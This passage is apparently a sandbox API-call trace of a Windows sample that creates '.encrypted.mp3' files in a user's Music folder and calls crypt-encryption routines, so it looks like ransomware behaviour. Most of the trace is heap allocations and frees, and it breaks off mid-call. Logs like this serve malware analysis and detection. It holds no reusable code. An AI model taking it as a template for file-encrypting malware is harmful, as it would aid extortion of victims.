(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.encrypted.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\65ojnsjozhlti0vkh7.encrypted.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0037.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.593] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0037.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.594] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0037.594] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0037.594] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0037.594] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0037.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0037.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0037.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.594] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0037.595] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0037.595] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x53dc, lpOverlapped=0x0) returned 1 [0037.596] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0037.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x53dc) returned 0xac0018 [0037.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0037.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0037.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x53dc) returned 0xac5400 [0037.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0037.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.597] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0037.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x53dc) returned 0xac0018 [0037.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0037.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0037.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.597] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0037.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0037.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0037.597] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.598] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0037.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x53dc) returned 0xac0018 [0037.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0037.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da408 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0037.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897c0 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0037.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x53dc) returned 0xaca7e8 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.599] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0037.599] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0037.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.600] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0037.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da278 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0037.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899b8 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0037.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.600] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0037.601] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0037.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0037.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0037.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0037.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0037.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.602] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0037.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0037.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0037.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0037.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0037.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0037.603] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0037.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0037.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0037.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0037.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0037.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.603] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: 